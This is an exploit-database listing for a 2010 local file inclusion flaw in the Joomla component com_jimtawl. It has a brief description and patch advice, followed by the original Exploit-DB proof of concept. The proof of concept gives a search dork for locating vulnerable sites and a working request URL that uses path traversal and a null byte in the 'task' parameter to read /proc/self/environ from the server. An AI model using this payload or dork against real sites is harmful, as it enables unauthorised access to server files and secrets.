header-logo
Suggest Exploit
vendor:
com_jimtawl
by:
Mask_magicianz
8,8
CVSS
HIGH
Local File Inclusion (LFI)
98
CWE
Product Name: com_jimtawl
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component (com_jimtawl) LFI Vulnerability

A Local File Inclusion (LFI) vulnerability was discovered in the Joomla Component (com_jimtawl) which allows an attacker to include local files on the vulnerable server. The vulnerability is due to insufficient sanitization of user-supplied input in the 'task' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to include local files on the vulnerable server, resulting in the disclosure of sensitive information.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the Joomla Component (com_jimtawl) to mitigate this vulnerability.
Source

Exploit-DB raw data:

-----------------------------------------------------------------------
     Joomla Component (com_jimtawl) LFI Vulnerability
-----------------------------------------------------------------------

Author      : Mask_magicianz
Date        : November, 20/2010
Location    : Medan, Indonesia
Time Zone   : GMT +7:00
Application : Package Jimtawl
Dork         : com_jimtawl
Contact     : Mask_magicianz[at]yahoo[dot]com
http://extensions.joomla.org/extensions/multimedia/streaming-a-broadcasting/audio-broadcasting/4344
_______________________________________________________________________

http://127.0.0.1/index.php?option=com_jimtawl&Itemid=12&task=[LFI]
http://127.0.0.1/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00


_______________________________________________________________________

Thanks to : All RosebanditZ Team & All IndonesiaCoder
_______________________________________________________________________